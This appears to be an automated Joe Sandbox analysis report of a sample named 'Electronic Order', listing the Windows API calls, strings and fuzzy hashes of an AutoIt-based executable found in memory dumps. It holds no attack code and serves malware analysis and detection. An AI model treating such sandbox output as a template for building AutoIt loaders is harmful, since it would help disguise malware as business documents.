                                      • Instruction Fuzzy Hash: 1C019278A00109EFCB84EF98C5909AEF7F5FB48710F208599D809AB701E730EE41DB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00E4F910), ref: 00E438AF
                                      • IsWindowVisible.USER32(?), ref: 00E438D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: e49872614786c16c8e209fefdeb0aac173182d734e10b2ab0c0c3e73c289e48c
                                      • Instruction ID: cb8699b13931fca7242574550fb016d41e0c93589da6dee4eadef2e85d34cd71
                                      • Opcode Fuzzy Hash: e49872614786c16c8e209fefdeb0aac173182d734e10b2ab0c0c3e73c289e48c
                                      • Instruction Fuzzy Hash: 39D1A330204205DBCB14EF21D855BAABBA1EF94354F11945CB8867B6A3DB70EE4ACB61
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 00E4A89F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00E4A8D0
                                      • GetSysColor.USER32(0000000F), ref: 00E4A8DC
                                      • SetBkColor.GDI32(?,000000FF), ref: 00E4A8F6
                                      • SelectObject.GDI32(?,?), ref: 00E4A905
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4A930
                                      • GetSysColor.USER32(00000010), ref: 00E4A938
                                      • CreateSolidBrush.GDI32(00000000), ref: 00E4A93F
                                      • FrameRect.USER32(?,?,00000000), ref: 00E4A94E
                                      • DeleteObject.GDI32(00000000), ref: 00E4A955
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00E4A9A0
                                      • FillRect.USER32(?,?,?), ref: 00E4A9D2
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4A9FD
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(00000012), ref: 00E4AB99
                                        • Part of subcall function 00E4AB60: SetTextColor.GDI32(?,?), ref: 00E4AB9D
                                        • Part of subcall function 00E4AB60: GetSysColorBrush.USER32(0000000F), ref: 00E4ABB3
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(0000000F), ref: 00E4ABBE
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(00000011), ref: 00E4ABDB
                                        • Part of subcall function 00E4AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4ABE9
                                        • Part of subcall function 00E4AB60: SelectObject.GDI32(?,00000000), ref: 00E4ABFA
                                        • Part of subcall function 00E4AB60: SetBkColor.GDI32(?,00000000), ref: 00E4AC03
                                        • Part of subcall function 00E4AB60: SelectObject.GDI32(?,?), ref: 00E4AC10
                                        • Part of subcall function 00E4AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E4AC2F
                                        • Part of subcall function 00E4AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4AC46
                                        • Part of subcall function 00E4AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E4AC5B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: dbf581e804487ec4c1abcbd31bc8f29a29d504242476f205ce2123f15bed3246
                                      • Instruction ID: f0a16fcf5c3db14a19b1433f90e68d83f86bfc8d447d4db715ed236b47c6ef3f
                                      • Opcode Fuzzy Hash: dbf581e804487ec4c1abcbd31bc8f29a29d504242476f205ce2123f15bed3246
                                      • Instruction Fuzzy Hash: 27A1CE76008301EFD7109F65EC08A6B7BA9FF89731F141A29F962B61E1C734D84ACB52
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00E377F1
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E378B0
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E378EE
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E37900
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E37946
                                      • GetClientRect.USER32(00000000,?), ref: 00E37952
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E37996
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E379A5
                                      • GetStockObject.GDI32(00000011), ref: 00E379B5
                                      • SelectObject.GDI32(00000000,00000000), ref: 00E379B9
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E379C9
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E379D2
                                      • DeleteDC.GDI32(00000000), ref: 00E379DB
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E37A07
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E37A1E
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E37A59
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E37A6D
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E37A7E
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E37AAE
                                      • GetStockObject.GDI32(00000011), ref: 00E37AB9
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E37AC4
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E37ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: fd69ed18244d29331ae0f8420e7078492e1f3901441738bf6603b9d100f9c03c
                                      • Instruction ID: 4e0cf113a89b5c580e9b586a1a0cb599badb066897dcfa64e5dd99d526c46cdf
                                      • Opcode Fuzzy Hash: fd69ed18244d29331ae0f8420e7078492e1f3901441738bf6603b9d100f9c03c
                                      • Instruction Fuzzy Hash: 61A181B1A40215BFEB14DBA5DC4AFAEBBB9EB49710F004154FA14B72E0C774AD05CB60
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2AF89
                                      • GetDriveTypeW.KERNEL32(?,00E4FAC0,?,\\.\,00E4F910), ref: 00E2B066
                                      • SetErrorMode.KERNEL32(00000000,00E4FAC0,?,\\.\,00E4F910), ref: 00E2B1C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 193b6704c2b087f549515ba863babd79813dc73942419048cb024a05fcc09e4d
                                      • Instruction ID: bbe82f2cd2de1c8eea345d9f7f7489ce20770a544abfa0475c618174926c76d8
                                      • Opcode Fuzzy Hash: 193b6704c2b087f549515ba863babd79813dc73942419048cb024a05fcc09e4d
                                      • Instruction Fuzzy Hash: B151E430681716EB8B04DB10E9A2DBD73B1FF94745728B02AF40AB7290C734AD51DB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: 4d971c130ffe668c7fa16bd220cf6a0d78592ba96bee8c1b8d1b9c1d9f5abca7
                                      • Instruction ID: f395bf6f64f411be6ac04aaa284e0dbd4877d7c657ba6475198e2ce5079e9d84
                                      • Opcode Fuzzy Hash: 4d971c130ffe668c7fa16bd220cf6a0d78592ba96bee8c1b8d1b9c1d9f5abca7
                                      • Instruction Fuzzy Hash: FF81EA70640356AACB20BF61DC93FBE7759EF15700F088029FE45AB196EB70DA85C671
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00E4AB99
                                      • SetTextColor.GDI32(?,?), ref: 00E4AB9D
                                      • GetSysColorBrush.USER32(0000000F), ref: 00E4ABB3
                                      • GetSysColor.USER32(0000000F), ref: 00E4ABBE
                                      • CreateSolidBrush.GDI32(?), ref: 00E4ABC3
                                      • GetSysColor.USER32(00000011), ref: 00E4ABDB
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4ABE9
                                      • SelectObject.GDI32(?,00000000), ref: 00E4ABFA
                                      • SetBkColor.GDI32(?,00000000), ref: 00E4AC03
                                      • SelectObject.GDI32(?,?), ref: 00E4AC10
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4AC2F
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4AC46
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4AC5B
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4ACA7
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E4ACCE
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00E4ACEC
                                      • DrawFocusRect.USER32(?,?), ref: 00E4ACF7
                                      • GetSysColor.USER32(00000011), ref: 00E4AD05
                                      • SetTextColor.GDI32(?,00000000), ref: 00E4AD0D
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E4AD21
                                      • SelectObject.GDI32(?,00E4A869), ref: 00E4AD38
                                      • DeleteObject.GDI32(?), ref: 00E4AD43
                                      • SelectObject.GDI32(?,?), ref: 00E4AD49
                                      • DeleteObject.GDI32(?), ref: 00E4AD4E
                                      • SetTextColor.GDI32(?,?), ref: 00E4AD54
                                      • SetBkColor.GDI32(?,?), ref: 00E4AD5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 8913d2c387aaafe79e7e8f6fc49e5b89cf6a04be5158fc0c88273357e8fb4bba
                                      • Instruction ID: 9015afd13046f6ddbe28865694a304180e2270aada4b41ce96807ae3064d0302
                                      • Opcode Fuzzy Hash: 8913d2c387aaafe79e7e8f6fc49e5b89cf6a04be5158fc0c88273357e8fb4bba
                                      • Instruction Fuzzy Hash: 59619B75900208EFDF109FA9EC48EAEBBB9EB09720F158125F911BB2A1D6759D41CF90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E48D34
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E48D45
                                      • CharNextW.USER32(0000014E), ref: 00E48D74
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E48DB5
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E48DCB
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E48DDC
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E48DF9
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E48E45
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E48E5B
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E48E8C
                                      • _memset.LIBCMT ref: 00E48EB1
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E48EFA
                                      • _memset.LIBCMT ref: 00E48F59
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E48F83
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E48FDB
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00E49088
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E490AA
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E490F4
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E49121
                                      • DrawMenuBar.USER32(?), ref: 00E49130
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E49158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 8000dc808c6414504686c5309474a0470ce0ca243484fe9b6baf8dd8e084adbd
                                      • Instruction ID: 3c6e252e5496fc9b7152a0defb5e947b7eb0fdd758b193e4bfa8608a17a36c03
                                      • Opcode Fuzzy Hash: 8000dc808c6414504686c5309474a0470ce0ca243484fe9b6baf8dd8e084adbd
                                      • Instruction Fuzzy Hash: F3E1B174901209AFDF209F61DC88EEF7BB9EF05714F009196F919BA291DB708A85DF60
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00E44C51
                                      • GetDesktopWindow.USER32 ref: 00E44C66
                                      • GetWindowRect.USER32(00000000), ref: 00E44C6D
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E44CCF
                                      • DestroyWindow.USER32(?), ref: 00E44CFB
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E44D24
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E44D42
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E44D68
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00E44D7D
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E44D90
                                      • IsWindowVisible.USER32(?), ref: 00E44DB0
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E44DCB
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E44DDF
                                      • GetWindowRect.USER32(?,?), ref: 00E44DF7
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00E44E1D
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00E44E37
                                      • CopyRect.USER32(?,?), ref: 00E44E4E
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00E44EB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 470428090162b953d2dddf38b41e47d4469ad03c2a1280f795179f32cebf2803
                                      • Instruction ID: 14b2a705adf7ceb9debad6ca6f8724a92ce87322b0576c186a811d2d6049e3ed
                                      • Opcode Fuzzy Hash: 470428090162b953d2dddf38b41e47d4469ad03c2a1280f795179f32cebf2803
                                      • Instruction Fuzzy Hash: 7EB18BB1604341AFDB04DF25D889B5ABBE4FF84714F00891CF599AB2A1DB70EC05CBA1
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E246E8
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E2470E
                                      • _wcscpy.LIBCMT ref: 00E2473C
                                      • _wcscmp.LIBCMT ref: 00E24747
                                      • _wcscat.LIBCMT ref: 00E2475D
                                      • _wcsstr.LIBCMT ref: 00E24768
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E24784
                                      • _wcscat.LIBCMT ref: 00E247CD
                                      • _wcscat.LIBCMT ref: 00E247D4
                                      • _wcsncpy.LIBCMT ref: 00E247FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 699586101-1459072770
                                      • Opcode ID: 53ecdaa126c5f550aa1b28e9741b13220cf89768404e9d64135b172b78f258dc
                                      • Instruction ID: c6e88d196a4dbaaf0536f086388462ce850ea05493fe741af2b39e561413dbe3
                                      • Opcode Fuzzy Hash: 53ecdaa126c5f550aa1b28e9741b13220cf89768404e9d64135b172b78f258dc
                                      • Instruction Fuzzy Hash: 8A414776A003907BEB14BB729C47EBF77ACDF42710F04016AF905F6182EB74AA0196B5
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC28BC
                                      • GetSystemMetrics.USER32(00000007), ref: 00DC28C4
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC28EF
                                      • GetSystemMetrics.USER32(00000008), ref: 00DC28F7
                                      • GetSystemMetrics.USER32(00000004), ref: 00DC291C
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DC2939
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DC2949
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DC297C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DC2990
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00DC29AE
                                      • GetStockObject.GDI32(00000011), ref: 00DC29CA
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC29D5
                                        • Part of subcall function 00DC2344: GetCursorPos.USER32(?), ref: 00DC2357
                                        • Part of subcall function 00DC2344: ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      • SetTimer.USER32(00000000,00000000,00000028,00DC1256), ref: 00DC29FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 67dfb1a1a739862f5633bdde5776f86edcfd40441c55d251f3065260afeef854
                                      • Instruction ID: 0968caa8192a9c5f4ea39387656bc4200c09da91461d8e236e6fd5977c3731ae
                                      • Opcode Fuzzy Hash: 67dfb1a1a739862f5633bdde5776f86edcfd40441c55d251f3065260afeef854
                                      • Instruction Fuzzy Hash: 63B16A75A0020AAFDB14DFA9DD45FAE7BB4FB08710F118129FA19E7290CB74E851CB60
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E440F6
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E441B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: a276297ab4e03a53b3b840244ac06c9d885e8c8d8019b3c2ff91d6e3398f81a3
                                      • Instruction ID: 8b5d6f6af0121593184476b6cd9f1926830e395de07353634c67b4d36fae616e
                                      • Opcode Fuzzy Hash: a276297ab4e03a53b3b840244ac06c9d885e8c8d8019b3c2ff91d6e3398f81a3
                                      • Instruction Fuzzy Hash: C8A181703142029BCB14EF20D951F6AB7E5FF84314F14596CB89AAB6D2DB70EC45CB61
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00E35309
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00E35314
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E3531F
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00E3532A
